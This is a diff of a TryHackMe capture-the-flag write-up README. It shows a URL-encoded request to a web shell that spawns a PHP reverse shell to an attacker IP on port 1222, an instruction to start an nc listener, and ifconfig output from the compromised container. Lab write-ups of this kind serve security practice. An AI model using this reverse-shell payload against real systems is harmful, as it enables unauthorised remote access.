zinzloun/THM_WriteUP/README.md

     www-data

-At this point we can get a shell using the same payload we used before (remember to start a nc listener on the attacker machine on port 1222
+At this point we can get a shell using the same payload we used before (remember to start a nc listener on the attacker machine on port 1222):

      http://192.168.100.1:8080/ws.php?c=php%20-r%20%27%24sock%3Dfsockopen%28%2210.50.74.35%22%2C1222%29%3Bexec%28%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

-### Flag submissions 2 and 3
-Futher investigate the server we notice that the webapp is actually a Docker container, and that the ssh server is active on the Docker interface as well (very insecure configuration):
+Futher investigate the server we notice that the running web app is actually a Docker container, and that the ssh server is active on the Docker interface as well (very insecure configuration):

     www-data@ip-10-200-95-33:/var/www/html$ ifconfig
     br-19e3b4fa18b8: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500